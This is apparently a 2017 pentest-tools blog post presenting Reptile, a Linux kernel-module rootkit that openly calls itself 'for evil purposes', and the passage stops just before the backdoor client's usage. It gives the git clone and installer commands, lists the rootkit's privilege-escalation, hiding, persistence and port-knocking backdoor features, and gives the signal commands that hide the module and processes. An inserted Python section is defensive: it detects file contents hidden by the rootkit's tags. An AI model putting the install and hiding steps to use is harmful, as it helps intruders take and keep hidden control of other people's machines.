Pentest Tools
Published on December 14th, 2017
Reptile: LKM Linux rootkit
Reptile is an LKM rootkit for evil purposes. If you are looking for material for study purposes only, see the demonstration code.
Features
- Give root to unprivileged users
- Hide files and directories
- Hide file contents
- Hide processes
- Hide itself
- Boot persistence
- Heaven’s door – An ICMP/UDP/TCP port-knocking backdoor
- Client to knock on heaven’s door
Install
apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install
Uninstall
kill -50 0
rmmod reptile_mod
./install.sh uninstall
Usage
Binaries are copied to the /reptile folder, which Reptile hides.
Getting root privileges
Hiding
- Hide/unhide reptile module: kill -50 0
- Hide/unhide process: kill -49 <PID>
- Hide file contents: all content between the tags will be hidden
Example:
#<reptile>
content to hide
#</reptile>
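For defenders, the tag-based hiding described above suggests a check: compare a file as read on the running host with the same file read from an offline disk image, and flag tag-delimited regions that are missing from the live view. This is an added example, not code from the Reptile project; the function names are hypothetical, the sample bytes are constructed, and it assumes the tags sit on their own lines as in the example above.

```python
import difflib

OPEN_TAG = b"#<reptile>"    # tag lines as shown on the page
CLOSE_TAG = b"#</reptile>"

def find_tagged_regions(data):
    """Return (first_line, last_line, closed) per tagged region, 1-indexed."""
    regions, start = [], None
    lines = data.splitlines()
    for lineno, line in enumerate(lines, 1):
        text = line.strip()
        if start is None and text == OPEN_TAG:
            start = lineno
        elif start is not None and text == CLOSE_TAG:
            regions.append((start, lineno, True))
            start = None
    if start is not None:  # opening tag with no closing tag
        regions.append((start, len(lines), False))
    return regions

def hidden_in_live(offline, live):
    """Tagged regions of the offline copy whose inner lines the live read lacks."""
    a, b = offline.splitlines(), live.splitlines()
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    missing = set()
    for op, i1, i2, _j1, _j2 in matcher.get_opcodes():
        if op in ("delete", "replace"):
            missing.update(range(i1 + 1, i2 + 1))  # 1-indexed offline lines
    flagged = []
    for first, last, closed in find_tagged_regions(offline):
        inner = range(first + 1, last if closed else last + 1)
        if len(inner) > 0 and all(n in missing for n in inner):
            flagged.append((first, last, closed))
    return flagged

# Constructed sample data: the same file from a disk image and from the live host.
OFFLINE = b"key=value\n#<reptile>\ncontent to hide\n#</reptile>\nmode=strict\n"
LIVE = b"key=value\nmode=strict\n"

if __name__ == "__main__":
    for first, last, closed in hidden_in_live(OFFLINE, LIVE):
        state = "closed" if closed else "unterminated"
        print(f"lines {first}-{last} ({state}) absent from live read")
```

The offline copy has to come from a disk image or a trusted boot environment, since a read on the affected host would return the filtered view for both inputs.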
Knocking on heaven’s door
Heaven’s door is an ICMP/UDP/TCP port-knocking backdoor used by Reptile. To access the backdoor you can use the client: